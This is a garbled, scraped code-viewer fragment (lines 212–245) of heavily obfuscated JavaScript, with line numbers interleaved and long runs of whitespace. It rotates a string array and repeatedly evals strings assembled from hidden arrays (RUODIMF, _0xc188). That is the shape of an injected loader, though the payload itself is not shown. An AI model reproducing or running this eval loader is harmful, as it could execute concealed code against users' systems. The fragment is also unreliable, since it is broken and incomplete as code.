                                                                                                                                                                                                                                                                                                                                                                                                                                                          {
                                                                                                                                                                                                                                                                                                                                                                                                                                                            212
                                                                                                                                                                                                                                                                                                                                                                                                                                                            var _0xade77a = parseInt ( _0x4e5a93 ( 0x1df ) ) / 0x1 * ( - parseInt ( _0x4e5a93 ( 0x1e7 ) ) / 0...
                                                                                                                                                                                                                                                                                                                                                                                                                                                              213
                                                                                                                                                                                                                                                                                                                                                                                                                                                              if ( _0xade77a === _0x5cf182 )
                                                                                                                                                                                                                                                                                                                                                                                                                                                                214
                                                                                                                                                                                                                                                                                                                                                                                                                                                                break ;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  215
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  else
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    216
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    _0x47acf3['push'] ( _0x47acf3['shift'] ( ) );
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      217
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      }
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        218
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        catch ( _0x14327f )
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          219
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            220
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            _0x47acf3['push'] ( _0x47acf3['shift'] ( ) );
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              221
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              }
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                222
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                }
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  223
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  } ( _0x59be, 0xba967 ),
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    224
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    RUODIMF[0x4] =
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      225
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      function () {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        226
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        return RUODIMF[0x3][0x0];
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          227
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          },
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            228
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            RUODIMF[0x5] =
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              229
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              function () {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                230
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                var _0x3e58d3 = _0x475c;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  231
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  for ( var _0x8f5906 = 0x0 ; _0x8f5906 < RUODIMF[0x2][_0x3e58d3 ( 0x1d8 ) ] ; _0x8f5906 ++ )
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    232
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      233
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      eval ( RUODIMF[0x2][_0x8f5906] );
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        234
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        }
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          RUODIMF[0x2][0x0] = RUODIMF[0x2][0x0] + [ _0x3e58d3 ( 0x1e5 ) ][_0x3e58d3 ( 0x1d9 ) ] ( 'Te' );
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            236
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            } );
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              237
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              var _0x16e9 = [];
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                238
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                eval ( [ _0xc188[4] ][_0xc188[3]] ( _0xc188[0], _0xc188[1], _0xc188[2] ) );
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  239
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  var exact = RUODIMF[3][1][_0xc188[6][_0xc188[5]][1]] = _0xc188[7];
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    240
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    eval ( _0xc188[8] );
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      241
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      eval ( [ _0xc188[13] ][_0xc188[3]] ( _0xc188[9], _0xc188[10], _0xc188[11], _0xc188[12] ) );
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        242
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        }
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          243
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          catch ( error )
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            244
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              245
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              }
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Reset < >